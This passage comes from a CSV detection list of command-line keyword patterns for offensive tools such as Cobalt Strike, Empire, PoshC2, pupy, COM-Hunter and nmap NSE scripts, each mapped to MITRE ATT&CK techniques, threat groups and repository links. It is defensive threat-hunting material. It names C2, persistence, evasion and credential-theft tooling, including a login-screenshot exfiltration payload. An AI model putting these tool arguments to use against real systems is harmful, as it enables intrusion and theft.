'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types svc.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types vbs*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* pcanywhere-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* pcworx-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -PE_Clone *","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"* -pe-exp-list *.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"* -PEPath * -ExeArgs *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -PermanentWMI *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* Persist General *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"* Persist Tasksch *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"* Persist TreatAs *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"* persist_hkcu_run*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* Persistence.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"* -PersistenceScriptName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -PersistentScriptFilePath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* PEzor.sh *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -pfx *.pfx -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* pgsql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -pi \\\\\\\\.\\\\pipe\\\\*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* Pictures\Screenshots\loot.zip*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* --pinject *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -PipeName * -ServiceName * -Command whoami*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"* pipename_stager *","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"* -pipename_stager *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"* pjl-info-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" +"* pjl-ready-message.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --plugin KeeFarceRebornPlugin.dll*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* polenum.py*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"* pop3-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* pop3-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* pop3-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* popcalc.bin *","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"* popcalc64.bin *","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"* --port 1337*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" +"* port-states.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* PoshC2 *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -PoshC2Dir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -PoshC2Dir 